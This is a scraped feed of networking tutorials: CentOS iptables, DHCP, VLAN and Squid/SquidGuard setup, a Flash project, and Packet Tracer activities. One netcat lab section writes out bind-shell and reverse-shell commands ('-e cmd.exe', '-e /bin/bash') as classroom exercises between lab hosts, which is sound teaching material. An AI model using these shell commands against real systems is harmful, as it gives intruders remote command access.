You can see that the third line (-A INPUT -i lo -j ACCEPT) is actually accepting all input on the loopback (lo) interface, and since it is only the loopback interface (i.e. 127.0.0.1) it is not a problem in the iptables, indiscriminately accepting all input on the outside interface. So to clarify, in the following three line commands (see below), the first command show the current iptables rules, the second command removes line 3 (-A INPUT -i lo -j ACCEPT) which is the line that ACCEPTs packets on the loopback interface, filter table, INPUT chain. Finally, the third line below replaces it. To learn how to do this I referred the man pages for iptables <man iptables>.
iptables-save
iptables -t filter -D INPUT 3
iptables -t filter -I INPUT 3 -i lo -j ACCEPT

13. Now you can look at your iptables, default filter table, and nat table, using the following commands
iptables -L -t filter
iptables -L -t nat  

14. Now you can add (append) to the iptable filter table with the following commands, to accept input on port 3128 for Squid, and reject all other types of traffic
iptables -t filter -A INPUT -p tcp --dport 3128 -j ACCEPT
iptables -t filter -A INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -L -t filter


 

15. The following commands and instructions are used to install and configure a DHCP server in CentOS. You will need elevate to root access, run updates, then install:
su -
yum install updates
yum install dhcp

16. You should see that the DHCP server fails on starting up, this is because we have not configured it yet. To configure the DHCP server we need to edit the dhcpd.conf file located in /etc/dhcp.
cd /etc/dhcp
ls

17. You should see a file called dhcpd.conf . You will want to edit the file in a text editor like Vim or Nano.
vim /etc/dhcp/dhcpd.conf
or
nano /etc/dhcp/dhcpd.conf

Here is a screenshot of my dhcpd.conf file after I edited it in Vim. The cat command is used to output the file to the terminal for viewing. The lines that begin with # are comments and not active configurations. You could duplicate what you see in my configuration file below, replacing every line that has 192.168.11.x ip addressing with your own network number, like 192.168.1.x, etc.:
cat /etc/dhcp/dhcpd.conf

 


{loadposition adposition8}

IPTABLES Overview

The iptables consists of four separate tables: filter, nat, mangle, and raw. Each table has a set of rules or chains.

filter - the filter table is the default table not specified by the -t argument. The filter table has three chains: INPUT for traffic destined for a local socket, FORWARD for packets being routed through the server, and OUTPUT for packets generated locally on the machine

nat - the nat table is consulted when new connections are generated. The nat table has three chains: PREROUTING, OUTPUT, and POSTROUTING

mangle - the mangle table is used for specialized packet alteration. The mangle table has the following chains: PREROUTING, POSTROUTING, INPUT, FORWARD, and OUTPUT.

raw - the raw table is used for configuring exemptions from connection tracking.  

Video Tutorials

In part 1, I outline creating a Linux proxy server and router and I diagram the network 

 

In part 2, I create the VMware virtual machine with two NICs and install CentOS


In part 3, I configure network addressing on the CentOS server and a Fedora client

 

In part 4, I review network addressing, how to do the lab if the server has only one network interface.
I also set up routing and NATing on the CentOS server

 

In part 5, I install Squid on the CentOS server and configure it to be a transparent proxy.
I configure the iptables NAT table, to portforward all local web traffic to the CentOS server on port 3128. 


In part 6, I continue to configure iptables and I install and configure DHCP server on the CentOS server. 


Netcat and Bind Shells

$
0
0
{loadposition adposition4}

Netcat and Bind Shells Overview

Netcat is a network connection tool that can read and write to TCP and UDP ports. It can do any kind of thing that acts like a server and a client. It could be a web server, a mail server, a chat server, or any other kind of server. It could be used to transfer files or serve any process even a command shell. "It is all things to all people for all reasons" - Steve B.  

{loadposition adposition5}Netcat is installed by default in BackTrack. The Linux binary is located in the /bin/nc and the Windows binary is in /pentest/windows-binaries/tools/nc.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: http://nmap.org/ncat/. Scroll to the bottom and look for the Windows binary.

sbd is a netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here: http://packetstormsecurity.org/UNIX/netcat/ 

A good overview about netcat: http://en.wikipedia.org/wiki/Netcat

 

{loadposition adposition6} Lab 1 - Setup a netcat connection between two hosts (send text)

  1. Connect to your XPclient (or any network host) and run netcat. The class XPclients have nc.exe in the extras folder.
  2. Copy and paste nc.exe in your c:\\WINDOWS\ directory so that you will have it available in your command PATH
  3. Open a command prompt and type:
            >nc -lvp 4444   //sets netcat to listen verbosely on port 4444
  4. Check with Netstat
            >netstat -an | FIND "4444"   //netcat is listening on tcp port 4444
  5. Go to your BackTrack client and open a terminal and type:
            #nc <ip address you are connecting to>  4444   //connect with netcat on port 4444
  6. You should eventually see an open connection, try type "hello" back and forth between clients.

Lab 2 - Transfer files using netcat (pipe to a file)

  1. In BackTrack use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
  2. In your XPclient type this into the command prompt:
            >nc -lvp 2233 > fileshare.txt
  3. From a BackTrack terminal type in the following commands:
            #nc <the IP address> 2233 < fileshare.txt 
  4. Check your XPclient to see if you received the file. 
  5. How would you make the listener (the server) send the file instead of receiving it?

{loadposition adposition7}Lab 3 - Bind a command prompt to a port creating a Bind Shell (the server has a shell listen )

  1. In your XPclient open a command prompt and type this:
            >nc -lvp 7777 -e cmd.exe    //this sets cmd.exe to execute on port 7777 when a connection is established
  2. In your BackTrack client open a terminal window and type this:
            #nc <the ip address to connect to> 7777   //connect with netcat on port 7777
  3. If you are successful you will eventually see a windows command shell in your BackTrack terminal. You bound a shell (cmd.exe) to a port and served it.

Lab 4 - Create a reverse Bind Shell (the client sends the shell)

  1. In your XPclient open a command prompt and type this:
            >nc -lvp 7777    //this sets netcat to listen on port 7777(server)
  2. In the BackTrack client in a terminal windows type the following:
            #nc -nv <the ip address> 7777 -e /bin/bash   //executes a bash shell on port 7777 to the listening nc server on the windows client
  3. If you are successful you will receive a shell on the XPclient that you can type bash commands. Try running an ls command. You will not see a # prompt.

{loadposition adposition8} 

Lab 5 - World's simplest web server (pipe a html file to a port)

  1. Create or download a simple webpage save it to the current directory and then put this command in a terminal
            #cat index.html | nc -vl 80
  2. Now on another computer on your network connect to that IP address and view the webpage

{loadposition adposition4} 

 

{loadposition adposition8} 

 

Route, NAT, and Transparent Proxy, with CentOS Linux - Part 2

$
0
0

{loadposition adposition4}

CentOS Routing and Proxy Cont.

In the previous article, I covered installing CentOS server and converting it to a router, address translator, and transparent proxy. I also covered installing a DHCP server to serve IP addresses to the interior local network. The entire process was recorded in a series of video tutorials (see previous article) and posted to YouTube.

{loadposition adposition5}Now that we have configured the iptables forwarding rules, manually configured our interfaces with IP addresses, as well as the default gateway and our DNS nameservers we need to save our configurations. We also need to cover installing BIND and having our CentOS server function as a DNS server as well.


Saving your iptables configuration

You can use terminal line commands to make changes to iptables which will instantly effect the linux firewall. This is similar to the difference between a Cisco router's startup-config file and its running-config in RAM. Changes to the running-config take effect immediately but are not permanent unless saved to the startup-config. This is a similar scenario with iptables. If you have made changes to iptables using iptables terminal commands, it will directly effect the Linux firewall, but the changes will not be permanent unless they are saved to the iptables configuration file.

There are different approaches to making changes to iptables: the approach we have been using so far is to make the changes to the iptables directly, using terminal commands; another approach is to save a test iptables configuration file and then load it, to test it out. Since we have been using the first approach we need to save our configuration to a file and then replace the default iptables configuration file. Before you replace the default file it is a good idea to create a backup. This command will take the current running iptables configuration which we have manipulated and altered, and save it to a .conf text file. You can save it to the root home folder.
iptables-save > iptables.conf

Now cat your saved iptables.conf file to look it over.
cat iptables.conf

The first command listed below makes a backup of the original default iptables configuration file, and the second command replaces the iptables configuration file with the current configuration, that was just saved as iptables.conf. Now, if the computer needs to be restarted the new configuration will be maintained.
cp /etc/sysconfig/iptables /etc/sysconfig/iptables.bak
mv iptables.conf /etc/sysconfig/iptables

{loadposition adposition6}You may decide that it is smarter and safer to make changes to the Linux iptables firewall indirectly, by editing a test iptables.conf file before testing it out on the actively running iptables firewall. In this way, you make all your changes to the iptables.conf file and then load it to memory, instead of using iptables terminal commands to experiment with your running configuration and possibly compromise your security or disrupt your network users. With the following commands you save the current iptables to an iptables.conf text file, then edit it with a text editor, then restore it to a running state in active memory. The iptables-restore command is a beneficial command because it loads the edited config file to the running iptables without disrupting the service and potentially dropping the running network host connections.
iptables-save > iptables.conf
nano iptables.conf (edit the iptables.conf configuration file)
iptables-restore < iptables.conf  (load the edited iptables.conf file to the running iptables) 
mv iptables.conf /etc/sysconfig/iptables
(replace the iptables configuration file with the edited version)

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 7


Saving manual network interface configurations

A regular desktop installation of CentOS Server comes with the Network Manager program. Network Manager is a graphical management tool used to manage and configure network interfaces in an easy way. It was personally recommended to me to not use the Network Manager, but instead manually configure my network interfaces, meaning Ethernet ports with IP addressing, subnet masks, default gateway address, and DNS servers. Like with iptables, you can manually configure your network interfaces using terminal line commands, but if you restart the server your configurations will not be saved. In order to configure your network interfaces in a manner that will persist, you need to configure the network interface configuration files or scripts.
ls /etc/sysconfig/network-scripts/

You should see configuration files named ifcfg-eth0, ifcfg-lo, or some other variant of ifcfg-<name> where <name> refers to the network interface name. To inspect the interface configuration you can output the text of the config file using cat
cat ls /etc/sysconfig/network-scripts/ifcfg-eth0

You will see some output like the following:
 DEVICE="eth0"
 NM_CONTROLLED="yes"
 ONBOOT="no"
 TYPE=Ethernet
 BOOTPROTO=dhcp
 DEFROUTE=yes
 IPV4_FAILURE_FATAL=yes
 IPV6INIT=no

This information tells us that Network Manager is managing the interface, the interface is not activated by default when the system boots up, and that the system is using DHCP to acquire an IP address. In order to manually configure the network interface you will need to change these settings and add some additional settings as well. Before you change the settings of the interfaces it is a good idea to create backup configuration files.  
cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.bak
cp /etc/sysconfig/network-scripts/ifcfg-eth1 /etc/sysconfig/network-scripts/ifcfg-eth1.bak

Now you can configure your interfaces by altering the configuration files in a text editor like Vim or Nano
nano /etc/sysconfig/network-scripts/ifcfg-eth0

{loadposition adposition7}Now alter and add the necessary settings and IP addressing for your outside interface. In my eth0 example below, I am on the 192.168.2.0/24 network using a static IP address of 192.168.2.98, a twenty four bit subnet mask, and a gateway located at 192.168.2.1. Changes are displayed in red:
 DEVICE="eth0"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 TYPE=Ethernet
 BOOTPROTO=none
 DEFROUTE=yes
 IPADDR=192.168.2.98  <whatever IP address your outside interface needs to be set at>
 NETMASK=255.255.255.0
 GATEWAY=192.168.2.1

 IPV4_FAILURE_FATAL=yes
 IPV6INIT=no
 <addtional entries not listed>

Save the interface configuration file and exit.

On the inside network interface (in my case eth1), I used the following settings: 
 DEVICE="eth1"
 HWADDR="00:0C:29:12:AE:75"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 IPADDR=192.168.111.1  //the IP address for your inside interface. I chose ".1" since I am the gateway for the inside network
 
NETMASK=255.255.255.0

Save the interface configuration file and exit. Now you can issue the following commands to verify your interface configurations and your default route
ifconfig
route

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 8

{loadposition adposition8}


Manual Configuration of Network Interfaces for Trunking and VLANs

At the time of writing this article, the network manager in CentOS does not allow you to configure a network interface with subinterfaces, VLANs, and trunking. In order to configure a single network interface to function as multiple subinterfaces which allow VLANS over a trunked link you need to manually configure your network interface configuration file.

In the following scenario suppose you have one network interface eth0 and you want your router to function as a transparent proxy and a router separating an interior network from an exterior network. In the image below you can see how this would logically be arranged in the logical topology, you have the 192.168.111.0/24 network on the interior LAN side, and the 192.168.11.0/24 network on the exterior facing WAN side, of course 192.168.11.0/24 is also in a private network address range, but it is on the side of the CentOS server that is closest to the internet. However, in reality you happen to be physically limited by having only one network interface (eth0) and will therefore need to convert the one interface into multiple subinterfaces with VLANs for a trunked link (Physical Topology).     


 

Looking at the physical topology in the diagram above, the CentOS server has transformed a single network interface eth0 into eth0.11 and eth0.111 for VLAN11 and VLAN111 respectively. From there the server is connected to the switch which has been configured as a trunk to allow VLAN11 and VLAN111. 

Here are the commands and configuration settings needed to configure the CentOS server to fit with the scenario depicted in the diagram above. The first step is to back up your default or current network interface configuration file. THen copy the configuration file and rename it for both of the subinterface VLANs:
cp /etc/sysconfig/network-scripts/eth0
/etc/sysconfig/network-scripts/eth0.bak
cp /etc/sysconfig/network-scripts/eth0 /etc/sysconfig/network-scripts/eth0.11
cp /etc/sysconfig/network-scripts/eth0 /etc/sysconfig/network-scripts/eth0.111

Now you will need to edit all three of your configuration files ifcfg-eth0, ifcfg-eth0.11 and ifcfg-eth0.111 in turn with a text editor like vi, vim, or nano. In configuring ifcfg-eth0 you will only need to make sure that the interface is activated on startup, and that the interface is not managed by the network manager:
vim /etc/sysconfig/network-scripts/ifcfg-eth0

  DEVICE="eth0"
  NM_CONTROLLED="no"
  ONBOOT="yes"
  TYPE=Ethernet

For the inside interface, the LAN side of the router (in the diagram VLAN111 eth0.111), you will mainly need to change the interface name, the ipaddress, netmask, add a VLAN setting. The default gateway and DNS settings will be configured on the outside facing interface. 
vim /etc/sysconfig/network-scripts/ifcfg-eth0.111

 DEVICE="eth0.111"
 HWADDR="00:0C:29:12:AE:75"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 IPADDR=192.168.111.1  //the IP address for your inside interface. I chose ".1" since I am the gateway for the inside network
 
NETMASK=255.255.255.0
 VLAN="yes"
 

For the outside facing interface, the WAN side of the router (in the diagram VLAN11 eth0.11), you will mainly need to change the interface name, the ipaddress, netmask, add a VLAN setting and add the default gateway and DNS settings. 
vim /etc/sysconfig/network-scripts/ifcfg-eth0.11

 DEVICE="eth0.11"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 TYPE=Ethernet
 BOOTPROTO=none
 DEFROUTE=yes
 IPADDR=192.168.11.100  <whatever IP address your outside interface needs to be set at>
 NETMASK=255.255.255.0
 GATEWAY=192.168.11.1
 DNS=127.0.0.1  <if your CentOS server will not be running DNS services, use your normal DNS server address instead>

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 9


 

Video Tutorials

 In part 7, I demonstrate how to save your iptables configuration and make it permanent

 

In part 8, I manually configure and save the Ethernet network interfaces, IP addresses and gateway address

 

In part 9, I manually configure a single network interface to be multiple subinterfaces in order to support VLANs and trunking 

 


A Flash Spaceship with Movieclips and Buttons - Actionscript 2 & 3

$
0
0
{loadposition adposition4}

Overview

A basic tutorial on Flash interactivity. In this project you create a Flash spaceship movieclip with 3 different states: thrusting, stopped, and shields. {loadposition adposition5}You will write the Actionscript code for three buttons, that will move the movieclip to three different animated states.

In the video tutorials below, I demonstrate how to create this project in Flash Professional CS6. The project uses: keyframe animation, movieclips, buttons, frame labels, instance names, the gotoAndPlay() and gotoAndStop() function, and the onPress event handler.

Video Tutorials 

In part 1, I create the spaceship movieclip and the three button symbols

 

In part 2, I create a looping animation and write the actionscript to control the timeline playhead using Flash buttons

In part 3, I set the button activation area, create timeline keyframe animation, use frame labels
with the gotoAndPlay() function, and use the onPress event handler to create a custom button function

In part 4, I show how to convert the Flash file from Actionsctipt 2.0 to 3.0

 

First Generation Video Tutorials

The videos below are early tutorials that I created for this project. In the videos, I am using an older version of Flash. The videos are examples of some of my earliest attempts at creating video tutorials. Even though the project was created with Flash CS3, the scripting is still valid Actionscript 2.0 code and will work in current versions of Flash.

Watch the videos and create the project. Save your flash authoring file (.fla) and email it to my gmail account as an attachment.

Note: The tutorials above were created in Flash CS3, but can easily be created in Flash CS4 or CS5. Make sure to choose Actionscript 2.0 when creating a new file to work from.

How to Install Squid & SquidGuard in CentOS

$
0
0
{loadposition adposition4}

How to Install Squid and SquidGuard in CentOS Overview

{loadposition adposition5}A proxy server is a very useful tool for a computer network. Proxy servers are commonly used in computer networks to protect the network from attack, to filter undesirable web content and web pages requested by local users, and to speed up the delivery of web pages and web content by caching (storing) commonly requested web pages, documents, and media. Proxy servers are typically implemented on private, local area networks, to filter, protect and cache content requested by users on that network, this is called "proxy" or "transparent proxy." Proxy servers can also be implemented on the remote side "in-front-of" destination webservers in order to protect those servers by filtering requests, speeding up web page delivery, and caching frequently requested files, this is called "reverse proxy." 

Squid is one of the most popular and most used proxy servers in the world. It is free to download, easy to install and it can be implemented on any distribution of Linux. Here are the steps to install and configure Squid and SquidGuard on a CentOS distribution of Linux.  



Types of Proxy Servers

Proxy Server The web browser on the client is configured to point to the proxy server's IP address. The client can bypass the proxy server by removing or altering the proxy address configuration. An administrator could prevent this by creating a GPO in Active Directory that blocks access to the web browser settings. A proxy server can also function as a caching server.
Transparent Proxy Server The router sends all traffic on defined ports, to the transparent proxy server, this way clients cannot bypass the proxy server. A transparent proxy server can also function as a caching server.
Reverse Proxy Server (Cache) The reverse proxy server or cache server is placed in-front-of or prior-to the web server in order to speed up delivery of frequently requested pages and to protect the web server by creating a layer of separation and redundancy.

{loadposition adposition4}

 

{loadposition adposition9} 

Step-by-step instructions

1. Install Squid, start it, and set it to start on boot.

$ su -
# yum install squid
# service squid start
# chkconfig squid on

Check to see if it is listening on port 3128.

# netstat -antp |grep squid
# ps -aux |grep squid

2. Edit the Squid configuration file to change Squid from IPv6 to IPv4. Reload Squid.

# vim /etc/squid/squid.conf

on line 62 change :::3128 to  0.0.0.0:3128
save
and quit.

# service squid reload

3. Set Firefox to use the Squid web proxy. Open firefox > edit-preferences > advanced > network tab > connection settings > manual proxy configuration.

set it to: 127.0.0.1:3128

4. You can monitor the access log to see it working.

# tail -f /var/log/squid/access.log 

Now browse somewhere in Firefox to see if you are able to receive webpages through the Squid proxy.

5. With Squid working you can now go about installing SquidGuard.

If you do not already have the EPEL repositories, you will need to install additional repositories in CentOS, in order to access to necessary software packages that are not available in the default repositories. Install the Extra Packages for Enterprise Linux (EPEL), the epel-release for the current version of Enterprise Linux (EL6). You can find it at the following website: http://fedoraproject.org/wiki/EPEL. A direct link to the RPM is in the command below. Eventually the link will be outdated and need to be replaced.
# yum install http://ftp.osuosl.org/pub/fedora-epel/6/i386/epel-release-6-8.noarch.rpm

Now install SquidGuard.

# yum install squidGuard

{loadposition adposition6}6. Now that SquidGuard is installed, open Firefox and go to the SquidGuard website: http://squidguard.org . The SquidGuard website has links to configuration documentation and websites to download blacklists. You need to download a blacklists file. You can go to http://dsi.ut-capitole.fr/blacklists/  and get the link for the blacklists.tar.gz file, then you can use wget to download blacklists.tar.gz, by copying and pasting the link, or you can download it through the Firefox web browser. Squidguard has its own blacklists.tar.gz file, and you will eventually want to replace it with the newer blacklists.tar.gz file that you downloaded. Before you do that, you can create a test blacklists file for SquidGuard to block. To do that you need to create a blacklists directory in the /var/squidGuard/ directory. Now, in the new blacklists directory use vim create and edit a text file called testdomains.

# cd /var/squidGuard
# mkdir blacklists
#
cd blacklists
# vim testdomains

type in three lines of text to add some test-domains to block:
yahoo.com
msn.com
whatever-you-want-to-block.com

save and exit.

7. Now edit the squidGuard.conf file to configure it to work with the testdomains file.

# vim /etc/squid/squidGuard.conf

In the config file, add the following text elements in red:

#dest adult {
#   domainlist blacklists/porn/domains
  urllist blacklists/porn/urls
#   expressionlist blacklists/porn/expressions
#   redirect        http://admin.foo.bar.de/cgi/blocked?clientaddr=%a+clientname=%n+clientuser=%i+clientgroup=%s+targetgroup=%t+url=%u

#}

dest test {
    domainlist testdomains
    redirect
https://www.google.com
}
acl {
     admin {
     pass any
     }

     foo-clients within workhours {
     #   pass good !in-addr !adult any
     } else {
           pass any
     }

     bar-clients {
     pass local none
     }

     default {
            pass !test any
            rewrite dmz
            redirect
https://www.google.com
     }
}

8. Now compile the SquidGuard blacklists and chown the blacklists to be accessible by Squid.

# squidGuard -b -d -C all
# chown -R squid /var/squidGuard/blacklists 

9. Edit the squid.conf file and then reload Squid.

# vim /etc/squid/squid.conf

add the following line to the squid.conf file around line 28:

url_rewrite_program /usr/bin/squidGuard

# service squid reload

10. Now open the Firefox browser and test to see if your testdomains are blocked but every other domain is allowed. 

 

{loadposition adposition8} 

 

Packet Tracer 6 Activity - RIPng and IPv6

$
0
0

{loadposition adposition4}

Overview

The goal in this activity is to configure an IPv6 network with the RIPng routing protocol. In addition to configuring RIPng on the routers, you will need to configure all of the devices in the network with the correct IPv6 addressing. The goal is to configure the routers and PCs with the following information:

{loadposition adposition5}
• Enable IPv6 routing on all routers,
• On all routers, configure link-local and global unicast IPv6 addresses with network prefix lengths (see the network diagram),
• On routers R1, R2, and R3 configure the RIPng IPv6 routing protocol (use the name: RIP1 in all caps as the routing process name),
• On router R1, configure a default route towards the ISP router, and use RIPng to distribute that route to routers R2 and R3,
• On router ISP, configure a summary route to reach all of the subnets on R1, R2, and R3,
• On the PCs configure static IPv6 addresses with network prefix lengths, and gateway addresses (see the network diagram),
• Configure hostnames on all routers and save the running configuration to the startup-configuration file

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PCB from PCA)

 

RIPng PTactivity

{loadposition adposition4}

Download

RIPng.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - read below if you are stuck and need help with the commands

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#ipv6 unicast-routing
R1(config)#interface g0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:1::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#no shut
R1(config-if)#interface s0/0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:2::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#ipv6 rip RIP1 default-information originate
R1(config-if)#clock rate 128000
R1(config-if)#no shut
R1(config-if)#interface s0/0/1
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:CD1:C::2/64
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ipv6 route ::/0 s0/0/1
R1(config)#exit
R1#copy running-config startup-config
R1#show running-config
R1#show ipv6 route
R1#show ipv6 int brief

{loadposition adposition8}


Packet Tracer 6 Activity - RIPng and IPv6

$
0
0

{loadposition adposition4}

Overview

The goal in this activity is to configure an IPv6 network with the RIPng routing protocol. In addition to configuring RIPng on the routers, you will need to configure all of the devices in the network with the correct IPv6 addressing. The goal is to configure the routers and PCs with the following information:

{loadposition adposition5}
• Enable IPv6 routing on all routers,
• On all routers, configure link-local and global unicast IPv6 addresses with network prefix lengths (see the network diagram),
• On routers R1, R2, and R3 configure the RIPng IPv6 routing protocol (use the name: RIP1 in all caps as the routing process name),
• On router R1, configure a default route towards the ISP router, and use RIPng to distribute that route to routers R2 and R3,
• On router ISP, configure a summary route to reach all of the subnets on R1, R2, and R3,
• On the PCs configure static IPv6 addresses with network prefix lengths, and gateway addresses (see the network diagram),
• Configure hostnames on all routers and save the running configuration to the startup-configuration file

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PCB from PCA)

 

RIPng PTactivity

{loadposition adposition4}

Download

RIPng.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - read below if you are stuck and need help with the commands

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#ipv6 unicast-routing
R1(config)#interface g0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:1::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#no shut
R1(config-if)#interface s0/0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:2::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#ipv6 rip RIP1 default-information originate
R1(config-if)#clock rate 128000
R1(config-if)#no shut
R1(config-if)#interface s0/0/1
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:CD1:C::2/64
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ipv6 route ::/0 s0/0/1
R1(config)#exit
R1#copy running-config startup-config
R1#show running-config
R1#show ipv6 route
R1#show ipv6 int brief

{loadposition adposition8}


CCNA1 Practice Final - Packet Tracer 6

$
0
0

{loadposition adposition4}

{loadposition adposition5}Lab Overview - CCNA 1 Practice Final

I designed this virtual lab activity to test you on the skills and knowledge necessary for the Cisco Academy CCNA5.0, Introduction to Networking hands-on lab final and Packet Tracer final. You will need Packet Tracer 6.0.1 to open the activity file. The activity tracks your overall progress and provides feedback on correctly executed tasks. Here is a list of the knowledge and skill areas that it covers:

• IPv4 addressing and subnetting,
• IPv6 addressing,
• Basic network device configuration for routers and switches,
• Basic network device access, security and encryption,
• Secure remote administration,
• Backing up network device configuration files to a TFTP server

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PC0 from PC2). In this PT activity access to the CLI tab has been disabled, so in order to configure the router and switches, you will need to console-in, using the console cable and the PC's terminal emulation program.

 

{loadposition adposition4}

Download

CCNA1-practice-final.zip

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

{loadposition adposition8}


 

Viewing all 59 articles
Browse latest View live